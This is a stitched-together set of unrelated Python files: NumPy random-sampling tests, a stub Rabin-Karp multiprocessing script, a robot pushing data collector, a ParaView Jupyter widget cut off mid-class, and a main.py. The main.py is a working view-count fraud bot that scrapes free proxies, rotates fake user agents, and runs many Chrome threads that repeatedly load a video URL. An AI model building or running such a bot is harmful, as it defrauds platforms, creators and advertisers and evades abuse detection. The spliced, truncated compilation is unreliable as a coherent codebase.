assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = np.random.RandomState().poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = np.random.poisson
desired = np.array([1, 1, 0])
self.setSeed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = np.random.zipf
desired = np.array([2, 2, 1])
self.setSeed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid='ignore'):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = np.random.geometric
desired = np.array([2, 2, 2])
self.setSeed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [0]
bad_nsample_two = [4]
hypergeom = np.random.hypergeometric
desired = np.array([1, 1, 1])
self.setSeed()
actual = hypergeom(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, bad_nbad, nsample)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood * 3, nbad, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, bad_nbad * 3, nsample)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_one)
assert_raises(ValueError, hypergeom, ngood, nbad * 3, bad_nsample_two)
self.setSeed()
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = np.random.logseries
desired = np.array([1, 1, 1])
self.setSeed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
class TestThread(object):
# make sure each state produces the same sequence even in threads
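# Illustrative property being checked (added comment, a sketch rather than
# part of the test): identically seeded generators produce identical draws
# regardless of which thread uses them, e.g.
#   np.random.RandomState(42).normal(size=3)
# yields the same array whether it is called from a worker thread or serially.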
def setup(self):
self.seeds = range(4)
def check_function(self, function, sz):
from threading import Thread
out1 = np.empty((len(self.seeds),) + sz)
out2 = np.empty((len(self.seeds),) + sz)
# threaded generation
t = [Thread(target=function, args=(np.random.RandomState(s), o))
for s, o in zip(self.seeds, out1)]
[x.start() for x in t]
[x.join() for x in t]
# the same serial
for s, o in zip(self.seeds, out2):
function(np.random.RandomState(s), o)
# these platforms change x87 fpu precision mode in threads
if np.intp().dtype.itemsize == 4 and sys.platform == "win32":
assert_array_almost_equal(out1, out2)
else:
assert_array_equal(out1, out2)
def test_normal(self):
def gen_random(state, out):
out[...] = state.normal(size=10000)
self.check_function(gen_random, sz=(10000,))
def test_exp(self):
def gen_random(state, out):
out[...] = state.exponential(scale=np.ones((100, 1000)))
self.check_function(gen_random, sz=(100, 1000))
def test_multinomial(self):
def gen_random(state, out):
out[...] = state.multinomial(10, [1/6.]*6, size=10000)
self.check_function(gen_random, sz=(10000, 6))
# See Issue #4263
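# Illustrative expectation (added comment, assumed semantics): a one-element
# array argument should yield a one-element array result, e.g.
#   np.random.exponential(np.array([2.0])).shape == (1,)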
class TestSingleEltArrayInput(object):
def setup(self):
self.argOne = np.array([2])
self.argTwo = np.array([3])
self.argThree = np.array([4])
self.tgtShape = (1,)
def test_one_arg_funcs(self):
funcs = (np.random.exponential, np.random.standard_gamma,
np.random.chisquare, np.random.standard_t,
np.random.pareto, np.random.weibull,
np.random.power, np.random.rayleigh,
np.random.poisson, np.random.zipf,
np.random.geometric, np.random.logseries)
probfuncs = (np.random.geometric, np.random.logseries)
for func in funcs:
if func in probfuncs: # p < 1.0
out = func(np.array([0.5]))
else:
out = func(self.argOne)
assert_equal(out.shape, self.tgtShape)
def test_two_arg_funcs(self):
funcs = (np.random.uniform, np.random.normal,
np.random.beta, np.random.gamma,
np.random.f, np.random.noncentral_chisquare,
np.random.vonmises, np.random.laplace,
np.random.gumbel, np.random.logistic,
np.random.lognormal, np.random.wald,
np.random.binomial, np.random.negative_binomial)
probfuncs = (np.random.binomial, np.random.negative_binomial)
for func in funcs:
if func in probfuncs: # p <= 1
argTwo = np.array([0.5])
else:
argTwo = self.argTwo
out = func(self.argOne, argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], argTwo)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, argTwo[0])
assert_equal(out.shape, self.tgtShape)
# TODO: Uncomment once randint can broadcast arguments
# def test_randint(self):
# itype = [bool, np.int8, np.uint8, np.int16, np.uint16,
# np.int32, np.uint32, np.int64, np.uint64]
# func = np.random.randint
# high = np.array([1])
# low = np.array([0])
#
# for dt in itype:
# out = func(low, high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low[0], high, dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
#
# out = func(low, high[0], dtype=dt)
# self.assert_equal(out.shape, self.tgtShape)
def test_three_arg_funcs(self):
funcs = [np.random.noncentral_f, np.random.triangular,
np.random.hypergeometric]
for func in funcs:
out = func(self.argOne, self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne[0], self.argTwo, self.argThree)
assert_equal(out.shape, self.tgtShape)
out = func(self.argOne, self.argTwo[0], self.argThree)
assert_equal(out.shape, self.tgtShape)
if __name__ == "__main__":
run_module_suite()
|
measure2.py
|
from rabinkarp_parallel import RabinKarpParallel
from multiprocessing import Process, Queue, Lock
from doc_handle import DocumentHandle
import sys
def main(lock):
processes = []
R = Queue()
# number of threads
k = 3
prk = RabinKarpParallel()
doc = DocumentHandle()
# open name and content original document
textname, txt = doc.get_txt()
# print txt
# open pattern name
filenames = doc.get_pat()
d = int((len(txt) - 5 + 1) / k + 1)
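# NOTE (added comment): each of the k processes scans roughly
# d = ceil((len(txt) - m + 1) / k) starting positions, where m = 5 appears to
# be the assumed pattern/shingle length; the "+ 5 - 1" passed to all_position
# below overlaps adjacent chunks by m - 1 positions so matches straddling a
# chunk boundary are not missed.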
for i in range(1, len(filenames)):
# open pattern one by one through the loop
patname = filenames[i].replace('\n', '')
with open(patname, 'r') as pattern:
pattern = pattern.read().replace('\n', ' ').replace('\t', ' ')
pattern = pattern.split()
# pattern = doc.wordshingling(pattern)
# print pattern
# print patname
# print pattern
for j in range(k - 1):
p = Process(target=all_position, args=(lock, int(j * d), int((j+1) * d) + 5 - 1, pattern, txt, i, R,))
processes.append(p)
p.start()
p = Process(target=all_position, args=(lock, int(d * (k-1)), len(txt) + 5 - 1, pattern, txt, i, R,))
processes.append(p)
p.start()
def all_position(l, x, y, pat, txt, i, R):
l.acquire()
print(pat)
l.release()
if __name__ == '__main__':
lock = Lock()
main(lock)
|
collect_data.py
|
from robot import Robot
import utils
import os
import time
import threading
import datetime
import argparse
import numpy as np
import cv2
from constants import workspace_limits, heightmap_resolution, DEPTH_MIN
class PushDataCollector():
def __init__(self, args):
# Create directory to save data
timestamp = time.time()
timestamp_value = datetime.datetime.fromtimestamp(timestamp)
self.continue_logging = args.continue_logging
if self.continue_logging:
self.base_directory = os.path.abspath(args.logging_directory)
print('Pre-loading data logging session: %s' % (self.base_directory))
else:
self.base_directory = os.path.join(os.path.abspath('logs_push'), timestamp_value.strftime('%Y-%m-%d.%H:%M:%S'))
print('Creating data logging session: %s' % (self.base_directory))
self.color_heightmaps_directory = os.path.join(self.base_directory, 'data', 'color-heightmaps')
self.depth_heightmaps_directory = os.path.join(self.base_directory, 'data', 'depth-heightmaps')
# self.prev_color_heightmaps_directory = os.path.join(self.base_directory, 'data', 'prev_color_heightmaps')
# self.prev_depth_heightmaps_directory = os.path.join(self.base_directory, 'data', 'prev_depth_heightmaps')
# self.prev_pose_heightmaps_directory = os.path.join(self.base_directory, 'data', 'prev_pose')
# self.next_color_heightmaps_directory = os.path.join(self.base_directory, 'data', 'next_color_heightmaps')
# self.next_depth_heightmaps_directory = os.path.join(self.base_directory, 'data', 'next_depth_heightmaps')
# self.next_pose_heightmaps_directory = os.path.join(self.base_directory, 'data', 'next_pose')
self.action_directory = os.path.join(self.base_directory, 'data', 'actions')
self.pose_heightmaps_directory = os.path.join(self.base_directory, 'data', 'poses')
if not os.path.exists(self.color_heightmaps_directory):
os.makedirs(self.color_heightmaps_directory)
if not os.path.exists(self.depth_heightmaps_directory):
os.makedirs(self.depth_heightmaps_directory)
# if not os.path.exists(self.prev_color_heightmaps_directory):
# os.makedirs(self.prev_color_heightmaps_directory)
# if not os.path.exists(self.prev_depth_heightmaps_directory):
# os.makedirs(self.prev_depth_heightmaps_directory)
# if not os.path.exists(self.prev_pose_heightmaps_directory):
# os.makedirs(self.prev_pose_heightmaps_directory)
# if not os.path.exists(self.next_color_heightmaps_directory):
# os.makedirs(self.next_color_heightmaps_directory)
# if not os.path.exists(self.next_depth_heightmaps_directory):
# os.makedirs(self.next_depth_heightmaps_directory)
# if not os.path.exists(self.next_pose_heightmaps_directory):
# os.makedirs(self.next_pose_heightmaps_directory)
if not os.path.exists(self.action_directory):
os.makedirs(self.action_directory)
if not os.path.exists(self.pose_heightmaps_directory):
os.makedirs(self.pose_heightmaps_directory)
self.iter = args.start_iter
self.start_iter = args.start_iter
self.end_iter = args.end_iter
self.loaded = False
self.saving_color_images = None
self.saving_depth_images = None
self.saving_actions = None
self.saving_poses = None
self.saving_iter = self.iter
def save_push_prediction_heightmaps(self, iteration, prev_color_heightmap, prev_depth_heightmap, next_color_heightmap, next_depth_heightmap):
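# NOTE (added comment): this helper writes to the prev_/next_ heightmap
# directories that are commented out in __init__ above; re-enable those
# attributes (and their os.makedirs calls) before calling it, otherwise it
# raises AttributeError.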
color_heightmap = cv2.cvtColor(prev_color_heightmap, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(self.prev_color_heightmaps_directory, '%07d.color.png' % (iteration)), color_heightmap)
depth_heightmap = np.round(prev_depth_heightmap * 100000).astype(np.uint16) # Save depth in 1e-5 meters
cv2.imwrite(os.path.join(self.prev_depth_heightmaps_directory, '%07d.depth.png' % (iteration)), depth_heightmap)
color_heightmap = cv2.cvtColor(next_color_heightmap, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(self.next_color_heightmaps_directory, '%07d.color.png' % (iteration)), color_heightmap)
depth_heightmap = np.round(next_depth_heightmap * 100000).astype(np.uint16) # Save depth in 1e-5 meters
cv2.imwrite(os.path.join(self.next_depth_heightmaps_directory, '%07d.depth.png' % (iteration)), depth_heightmap)
def save_heightmaps(self, iteration, color_heightmap, depth_heightmap):
color_heightmap = cv2.cvtColor(color_heightmap, cv2.COLOR_RGB2BGR)
cv2.imwrite(os.path.join(self.color_heightmaps_directory, '%07d.color.png' % (iteration)), color_heightmap)
depth_heightmap = np.round(depth_heightmap * 100000).astype(np.uint16) # Save depth in 1e-5 meters
cv2.imwrite(os.path.join(self.depth_heightmaps_directory, '%07d.depth.png' % (iteration)), depth_heightmap)
def save_action(self, iteration, pose):
np.savetxt(os.path.join(self.action_directory, '%07d.action.txt' % (iteration)), pose, fmt='%s')
def save_pose(self, iteration, pose):
np.savetxt(os.path.join(self.pose_heightmaps_directory, '%07d.pose.txt' % (iteration)), pose, fmt='%s')
def push_check(self, args):
"""
Script to check the correctness of the collection process.
"""
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None # Directory containing 3D mesh files (.obj) of objects to be added to simulation
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = args.tcp_host_ip if not is_sim else None # IP and port to robot arm as TCP client (UR5)
tcp_port = args.tcp_port if not is_sim else None
rtc_host_ip = args.rtc_host_ip if not is_sim else None # IP and port to robot arm as real-time client (UR5)
rtc_port = args.rtc_port if not is_sim else None
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing=False, test_preset_cases=False, test_preset_file='', collect_push=True)
print('\nStart', self.iter)
robot.check_sim()
robot.restart_sim()
robot.add_object_push()
start_x, start_y = input("Input action position: ").split()
start_x = float(start_x)
start_y = float(start_y)
for i in range(10):
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
prev_obj_positions, prev_obj_orientations = robot.get_obj_positions_and_orientations()
poses = (prev_obj_positions[0][0], prev_obj_positions[0][1], prev_obj_orientations[0][0], prev_obj_orientations[0][1], prev_obj_orientations[0][2],
prev_obj_positions[1][0], prev_obj_positions[1][1], prev_obj_orientations[1][0], prev_obj_orientations[1][1], prev_obj_orientations[1][2])
print(prev_obj_positions[0], prev_obj_orientations[0])
print(prev_obj_positions[1], prev_obj_orientations[1])
# push 1 cm
action = [start_x + i * 0.01, start_y, 0.001]
push_success = robot.push(action, 0, workspace_limits)
assert push_success
input("press to continue")
self.save_heightmaps(self.iter * 100 + i, prev_color_heightmap, prev_valid_depth_heightmap)
self.save_action(self.iter * 100 + i, [action[:2]])
self.save_pose(self.iter * 100 + i, [poses])
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
prev_obj_positions, prev_obj_orientations = robot.get_obj_positions_and_orientations()
poses = (prev_obj_positions[0][0], prev_obj_positions[0][1], prev_obj_orientations[0][0], prev_obj_orientations[0][1], prev_obj_orientations[0][2],
prev_obj_positions[1][0], prev_obj_positions[1][1], prev_obj_orientations[1][0], prev_obj_orientations[1][1], prev_obj_orientations[1][2])
print(prev_obj_positions[0], prev_obj_orientations[0])
print(prev_obj_positions[1], prev_obj_orientations[1])
self.save_heightmaps(self.iter * 100 + i + 1, prev_color_heightmap, prev_valid_depth_heightmap)
self.save_pose(self.iter * 100 + i + 1, [poses])
def push_data_collect(self, args):
"""
Randomly drop objects into the workspace; the robot then pushes from left to right, recording heightmaps, actions, and object poses every 1 cm.
"""
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None # Directory containing 3D mesh files (.obj) of objects to be added to simulation
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = args.tcp_host_ip if not is_sim else None # IP and port to robot arm as TCP client (UR5)
tcp_port = args.tcp_port if not is_sim else None
rtc_host_ip = args.rtc_host_ip if not is_sim else None # IP and port to robot arm as real-time client (UR5)
rtc_port = args.rtc_port if not is_sim else None
# -------------- Testing options --------------
is_testing = args.is_testing
test_preset_cases = args.test_preset_cases
test_preset_file = os.path.abspath(args.test_preset_file) if test_preset_cases else None
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing=is_testing, test_preset_cases=test_preset_cases, test_preset_file=test_preset_file, collect_push=True)
thread = threading.Thread(target=self.saving_thread, args=(robot,))
thread.start()
while self.iter < self.end_iter:
print('\nCollecting data iteration: %d' % (self.iter))
# Make sure simulation is still stable (if not, reset simulation)
if is_sim:
robot.check_sim()
robot.restart_sim()
bbox_heights = robot.add_object_push()
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
prev_obj_positions, prev_obj_orientations = robot.get_obj_positions_and_orientations()
skip = False
for i in range(len(prev_obj_positions)):
if (prev_obj_positions[i][0] < workspace_limits[0][0] or prev_obj_positions[i][0] > workspace_limits[0][1] or
prev_obj_positions[i][1] < workspace_limits[1][0] or prev_obj_positions[i][1] > workspace_limits[1][1]):
print("Out of space, Skip")
skip = True
break
if prev_obj_positions[i][2] > bbox_heights[i]:
print("height is wrong Skip")
skip = True
break
if skip: continue
# Find target and push
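# Heuristic used below (added comment): pick a random occupied row y, ignoring
# a 10-pixel margin at each end of the occupied band; take the leftmost
# occupied column within a +/-5-row band around y; then back the start point
# off by 10 pixels, presumably so the push begins in free space.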
depth_heightmap = np.copy(prev_valid_depth_heightmap)
depth_heightmap[depth_heightmap <= DEPTH_MIN] = 0
depth_heightmap[depth_heightmap > DEPTH_MIN] = 1
y_indices = np.argwhere(depth_heightmap == 1)[:, 0] # Find the y range
if len(y_indices) == 0:
print("find Skip")
continue
y_list = np.arange(y_indices.min(), y_indices.max() + 1)
if len(y_list) == 0:
print("min Skip")
continue
y_list = y_list[10:len(y_list)-10]
if len(y_list) == 0:
print("shrink Skip")
continue
y = np.random.choice(y_list)
x_indices = np.argwhere(depth_heightmap[y, :] == 1)[:, 0] # Find the x range
x_indices_up = np.argwhere(depth_heightmap[max(y-5, 0)] == 1)[:, 0] # Find the x range
x_indices_down = np.argwhere(depth_heightmap[min(y+5, 223)] == 1)[:, 0] # Find the x range
if len(x_indices) == 0:
print("Skip")
continue
x = x_indices.min()
if len(x_indices_up) != 0:
x = min(x, x_indices_up.min())
if len(x_indices_down) != 0:
x = min(x, x_indices_down.min())
x = x - 10
if x <= 0:
print("Skip")
continue
# safe_kernel = 16
# local_region = prev_valid_depth_heightmap[max(x - safe_kernel, 0):min(y + safe_kernel + 1, prev_valid_depth_heightmap.shape[0]), max(x - safe_kernel, 0):min(x + safe_kernel + 1, prev_valid_depth_heightmap.shape[1])]
# if local_region.size == 0:
# safe_z_position = workspace_limits[2][0]
# else:
# if np.max(local_region) < 0.03:
# safe_z_position = workspace_limits[2][0]
# else:
# safe_z_position = 0.025 + workspace_limits[2][0]
safe_z_position = workspace_limits[2][0]
_, color_images, depth_images, actions, poses = robot.push_with_stream([x * heightmap_resolution + workspace_limits[0][0], y * heightmap_resolution + workspace_limits[1][0], safe_z_position], 0, workspace_limits)
while self.loaded:
print('Wait for saving iteration:', self.saving_iter)
time.sleep(1)
self.saving_color_images = color_images
self.saving_depth_images = depth_images
self.saving_actions = actions
self.saving_poses = poses
self.saving_iter = self.iter
self.loaded = True
self.iter += 1
def push_data_collect_real(self, args):
"""
Because sim-to-real transfer is still a work in progress, this part hasn't been completed, but the idea and process should be the same.
"""
# --------------- Setup options ---------------
is_sim = args.is_sim # Run in simulation?
# Directory containing 3D mesh files (.obj) of objects to be added to simulation
obj_mesh_dir = os.path.abspath(args.obj_mesh_dir) if is_sim else None
num_obj = args.num_obj if is_sim else None # Number of objects to add to simulation
tcp_host_ip = '172.19.97.157' # IP and port to robot arm as TCP client (UR5)
tcp_port = 30002
rtc_host_ip = '172.19.97.157' # IP and port to robot arm as real-time client (UR5)
rtc_port = 30003
# Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
heightmap_resolution = args.heightmap_resolution # Meters per pixel of heightmap
is_testing = args.is_testing
test_preset_cases = args.test_preset_cases
test_preset_file = os.path.abspath(args.test_preset_file) if test_preset_cases else None
# Initialize pick-and-place system (camera and robot)
robot = Robot(is_sim, obj_mesh_dir, num_obj, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
is_testing=is_testing, test_preset_cases=test_preset_cases, test_preset_file=test_preset_file, collect_push=True)
thread = threading.Thread(target=self.saving_thread, args=(robot,))
thread.start()
while self.iter < self.end_iter:
print('\nCollecting data iteration: %d' % (self.iter))
# Get latest RGB-D image
color_img, depth_img = robot.get_camera_data()
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
prev_color_heightmap, prev_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
prev_valid_depth_heightmap = prev_depth_heightmap.copy()
prev_valid_depth_heightmap[np.isnan(prev_valid_depth_heightmap)] = 0
# center
x = 40
y = 112
safe_z_position = workspace_limits[2][0] + 0.1
_, color_images, depth_images, actions, poses = robot.push_with_stream([x * heightmap_resolution + workspace_limits[0][0], y * heightmap_resolution + workspace_limits[1][0], safe_z_position], 0, workspace_limits)
while self.loaded:
print('Wait for saving iteration:', self.saving_iter)
time.sleep(1)
self.saving_color_images = color_images
self.saving_depth_images = depth_images
self.saving_actions = actions
self.saving_poses = poses
self.saving_iter = self.iter
self.loaded = True
self.iter += 1
def saving_thread(self, robot):
print('Saving started')
while True:
if self.loaded:
print('Saving iteration:', self.saving_iter)
for i in range(len(self.saving_color_images)):
color_img = self.saving_color_images[i]
depth_img = self.saving_depth_images[i]
depth_img = depth_img * robot.cam_depth_scale # Apply depth scale from calibration
# Get heightmap from RGB-D image (by re-projecting 3D point cloud)
next_color_heightmap, next_depth_heightmap = utils.get_heightmap(color_img, depth_img, robot.cam_intrinsics, robot.cam_pose, workspace_limits, heightmap_resolution)
next_valid_depth_heightmap = next_depth_heightmap.copy()
next_valid_depth_heightmap[np.isnan(next_valid_depth_heightmap)] = 0
self.save_heightmaps(self.saving_iter * 100 + i, next_color_heightmap, next_valid_depth_heightmap)
self.save_action(self.saving_iter * 100 + i, [self.saving_actions[i]])
self.save_pose(self.saving_iter * 100 + i, [self.saving_poses[i]])
# print('Push', self.saving_actions[i])
# print('Pose', self.saving_poses[i])
print('Saved iteration:', self.saving_iter)
self.loaded = False
else:
time.sleep(1)
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser(description='Collect data for push prediction')
# --------------- Setup options ---------------
parser.add_argument('--is_sim', dest='is_sim', action='store_true', default=False, help='run in simulation?')
parser.add_argument('--is_real', dest='is_real', action='store_true', default=False, help='run on the real robot?')
parser.add_argument('--obj_mesh_dir', dest='obj_mesh_dir', action='store', default='objects/final-push', help='directory containing 3D mesh files (.obj) of objects to be added to simulation')
parser.add_argument('--num_obj', dest='num_obj', type=int, action='store', default=7, help='number of objects to add to simulation')
parser.add_argument('--tcp_host_ip', dest='tcp_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as TCP client (UR5)')
parser.add_argument('--tcp_port', dest='tcp_port', type=int, action='store', default=30002, help='port to robot arm as TCP client (UR5)')
parser.add_argument('--rtc_host_ip', dest='rtc_host_ip', action='store', default='100.127.7.223', help='IP address to robot arm as real-time client (UR5)')
parser.add_argument('--rtc_port', dest='rtc_port', type=int, action='store', default=30003, help='port to robot arm as real-time client (UR5)')
parser.add_argument('--heightmap_resolution', dest='heightmap_resolution', type=float, action='store', default=0.002, help='meters per pixel of heightmap')
# ------ Pre-loading and logging options ------
parser.add_argument('--continue_logging', dest='continue_logging', action='store_true', default=False, help='continue logging from previous session?')
parser.add_argument('--logging_directory', dest='logging_directory', action='store')
parser.add_argument('--check', dest='check', action='store_true', default=False)
parser.add_argument('--start_iter', dest='start_iter', type=int, action='store', default=0)
parser.add_argument('--end_iter', dest='end_iter', type=int, action='store', default=50000)
# -------------- Testing options --------------
parser.add_argument('--is_testing', dest='is_testing', action='store_true', default=False)
parser.add_argument('--max_test_trials', dest='max_test_trials', type=int, action='store', default=30, help='maximum number of test runs per case/scenario')
parser.add_argument('--test_preset_cases', dest='test_preset_cases', action='store_true', default=False)
parser.add_argument('--test_preset_file', dest='test_preset_file', action='store', default='new-01.txt')
# Run main program with specified arguments
args = parser.parse_args()
collector = PushDataCollector(args)
if args.check:
collector.push_check(args)
elif args.is_real:
collector.push_data_collect_real(args)
else:
collector.push_data_collect(args)
|
main.py
|
import re
import requests
from os import _exit
from time import sleep
from random import choice,uniform
from threading import Thread
from argparse import ArgumentParser
from selenium import webdriver
from selenium.webdriver.common.proxy import Proxy,ProxyType
from fake_useragent import UserAgent
parser=ArgumentParser()
parser.add_argument('-t','--threads',type=int,help='number of threads',default=15)
parser.add_argument('-u','--url',help='video url',default='',required=True)
parser.add_argument('-d','--duration',help='duration of video in seconds',default=5*60)
parser.add_argument('-p','--proxies',help='proxies list')
args=parser.parse_args()
def bot(url):
try:
while True:
proxy.http_proxy=choice(proxies)
proxy.ssl_proxy=proxy.http_proxy
print(proxy.http_proxy)
chrome_options.add_argument('user-agent="{}"'.format(agent.random))
capabilities=webdriver.DesiredCapabilities.CHROME
proxy.add_to_capabilities(capabilities)
driver=webdriver.Chrome(options=chrome_options,desired_capabilities=capabilities)
driver.get(args.url)
sleep(args.duration)
driver.close()
except:
_exit(0)
if args.proxies:
proxies=open(args.proxies,'r').read().split('\n')
else:
proxies=re.findall(re.compile('<td>([\d.]+)</td>'),str(requests.get('https://free-proxy-list.net/').content))
proxies=['%s:%s'%x for x in list(zip(proxies[0::2],proxies[1::2]))]
print('%d proxies successfully loaded!'%len(proxies))
proxy=Proxy()
proxy.proxy_type=ProxyType.MANUAL
agent=UserAgent()
chrome_options=webdriver.ChromeOptions()
chrome_options.add_argument('--mute-audio')
for i in range(args.threads):
    t=Thread(target=bot,args=(args.url,))
    t.daemon=True
    t.start()
    # stagger thread start-up so browser instances do not launch all at once
    sleep(uniform(1.5,3.0))
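# Usage sketch (hedged): the invocation below is illustrative; proxies.txt is a hypothetical
# file containing one host:port proxy per line.
#   python main.py -u https://www.youtube.com/watch?v=VIDEO_ID -t 10 -d 300 -p proxies.txt
# Without -p/--proxies, the script scrapes a proxy list from free-proxy-list.net instead.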
|
widgets.py
|
###############################################################################
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###############################################################################
# for jpeg / png transfer ("compress frames"):
import base64
import threading
import time
from io import BytesIO
import ipywidgets as widgets
import numpy as np
from PIL import Image
from traitlets import Bytes, Float, Tuple, Unicode
# Functions for handling camera interaction
from .camera_models import (
rotateCameraTurntable,
panCameraTurntable,
zoomCameraTurntable,
)
@widgets.register
class PVDisplay(widgets.DOMWidget):
"""A ParaView interactive render widget"""
_view_name = Unicode("PVDisplayView").tag(sync=True)
_model_name = Unicode("PVDisplayModel").tag(sync=True)
_view_module = Unicode("ipyparaview").tag(sync=True)
_model_module = Unicode("ipyparaview").tag(sync=True)
_view_module_version = Unicode("^0.1.2").tag(sync=True)
_model_module_version = Unicode("^0.1.2").tag(sync=True)
# traitlets -- variables synchronized with front end
frame = Bytes().tag(sync=True)
compressedFrame = Bytes().tag(sync=True)
resolution = Tuple((800, 500)).tag(sync=True) # canvas resolution; w,h
fpsLimit = Float(60.0).tag(sync=True) # maximum render rate
maxEventRate = Float(20.0).tag(sync=True) # maximum number of mouse events/s
# class variables
instances = dict()
rotateScale = 5.0
zoomScale = 0.05
@classmethod
def GetOrCreate(cls, ren, runAsync=True, **kwargs):
"""
Check if a PVDisplay instance already exists for the renderer. If yes, return that instance; otherwise, create a new one.
"""
instance = cls.instances.get(ren, None)
if instance is None:
instance = PVDisplay(ren, runAsync, **kwargs)
cls.instances.update({ren: instance})
return instance
def __init__(self, ren, runAsync=True, compressFrames=False, **kwargs):
# see if we can import Dask.distributed, then try guessing the render
# mode based on the type of ren. Fallback to regular Jupyter rendering
# otherwise
try:
import dask.distributed as distributed
if type(ren) == list and type(ren[0]) == distributed.actor.Actor:
self.mode = "Dask"
else:
self.mode = "Jupyter"
except ImportError:
self.mode = "Jupyter"
if self.mode == "Jupyter" and ren in PVDisplay.instances:
raise RuntimeError(
f"A PVDisplay instance already exists for this renderer. Use PVDisplay.GetOrCreate() to avoid this error."
)
super(PVDisplay, self).__init__(**kwargs) # must call super class init
# regular vars
self.compressFrames = compressFrames
self.pvs, self.renv, self.w2i = (
None,
None,
None,
) # used for Jupyter kernel rendering
self.master, self.renderers = None, [] # used for Dask rendering
self.tp = time.time() # time of latest render
self.fps = 10.0
